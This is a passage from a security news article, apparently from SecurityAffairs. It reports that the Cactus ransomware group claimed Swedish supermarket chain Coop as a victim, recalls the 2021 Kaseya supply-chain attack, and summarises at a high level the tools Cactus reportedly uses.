disclose a huge amount of personal information over 21 thousand directories ppThe Cactus ransomware group added Coop to the list of victims on its Tor leak siteppThreat actors have published ID cards as proof of hackppIn July 2021 the Swedish supermarket chain Coop was the first company to disclose the impact of the supply chain ransomware attack that hit KaseyappThe supermarket chain Coop shut down approximately 500 stores as a result of the supply chain ransomware attack that hit the provider KaseyappCoop doesnt use Kesaya software anyway it was impacted by the incident because one of their software providers doesppAccording to BleepingComputer the impacted provider was the Swedish MSP Visma who manages the payment systems for the supermarket chainppVisma confirmed they were affected by the Kaseya cyber attack that allowed the REvil ransomware to encrypt their customers systemsppThe Cactus ransomware operation has been active since March 2023 despite the threat actors use a doubleextortion model their data leak site has yet to be discoveredppKroll researchers reported that the ransomware strain outstands for the use of encryption to protect the ransomware binaryppCactus ransomware uses the SoftPerfect Network Scanner netscan to look for other targets on the network along with PowerShell commands to enumerate endpoints The ransomware identifies user accounts by viewing successful logins in Windows Event Viewer it also uses a modified variant of the opensource PSnmap ToolppThe Cactus ransomware relies on multiple legitimate tools eg Splashtop AnyDesk SuperOps RMM to achieve remote access and uses Cobalt Strike and the proxy tool Chisel in postexploitation activitiesppOnce the malware has escalated the privileges on a machine the threat actors use a batch script to uninstall popular antivirus solutions installed on the machineppCactus uses the Rclone tool for data exfiltration and used a PowerShell script called TotalExec which was used in the past by BlackBasta ransomware operators to automate the deployment of the encryption processppFollow me on Twitter securityaffairs and Facebook and MastodonppPierluigi PaganinippSecurityAffairs  hacking Cactus ransomware groupppppCyber Crime January 22 2024ppMalware January 22 2024ppData Breach January 22 2024ppMalware January 22 2024ppCyber Crime January 21 2024ppTo contact me write an email to
Pierluigi Paganini
email protected
pp
Copyrightsecurityaffairs 2023 p